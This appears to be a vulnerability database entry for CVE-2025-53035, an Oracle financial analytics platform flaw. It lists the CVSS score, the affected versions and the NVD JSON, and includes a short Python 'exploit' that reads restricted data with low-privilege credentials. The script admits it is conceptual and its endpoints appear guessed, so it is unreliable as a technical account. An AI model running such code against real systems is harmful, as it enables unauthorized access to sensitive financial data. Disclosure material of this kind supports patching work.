Security Vulnerability Report
中文
CVE-2025-53035 CVSS 6.5 MEDIUM

CVE-2025-53035

Published: 2025-10-21 20:20:41
Last Modified: 2025-10-23 16:08:56

Description

Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Financial Services Analytical Applications Infrastructure 8.0.7.9
Oracle Financial Services Analytical Applications Infrastructure 8.0.8.7
Oracle Financial Services Analytical Applications Infrastructure 8.1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53035 - Oracle Financial Services Analytical Applications Infrastructure # Information Disclosure via Platform Component # Note: This is a conceptual PoC based on vulnerability description. # Actual exploitation requires valid low-privileged credentials. import requests TARGET_URL = "https://target-oracle-fsaa-host:port" USERNAME = "low_priv_user" PASSWORD = "user_password" # Step 1: Authenticate to obtain session token session = requests.Session() login_url = f"{TARGET_URL}/auth/login" login_payload = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_payload) # Step 2: Exploit the Platform component to access unauthorized data # The vulnerability exists in the Platform component allowing # low-privileged users to access critical data platform_endpoint = f"{TARGET_URL}/platform/api/v1/sensitive-data" headers = { "Content-Type": "application/json", "Authorization": f"Bearer {session.cookies.get('session_token')}" } # Step 3: Request sensitive data that should be restricted exploit_response = session.get(platform_endpoint, headers=headers) if exploit_response.status_code == 200: print("[+] Unauthorized data accessed successfully!") print(exploit_response.json()) else: print(f"[-] Exploit failed with status code: {exploit_response.status_code}") # Mitigation: Apply Oracle CPU October 2025 patch immediately

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53035", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:40.650", "lastModified": "2025-10-23T16:08:56.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "01413F8D-9A00-4D47-AEFC-B214F24DF7E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "99758374-009C-4AD2-8402-F8F0ACE6B289"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "93333ABD-DCF3-46E6-8053-36B62D7431A3"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}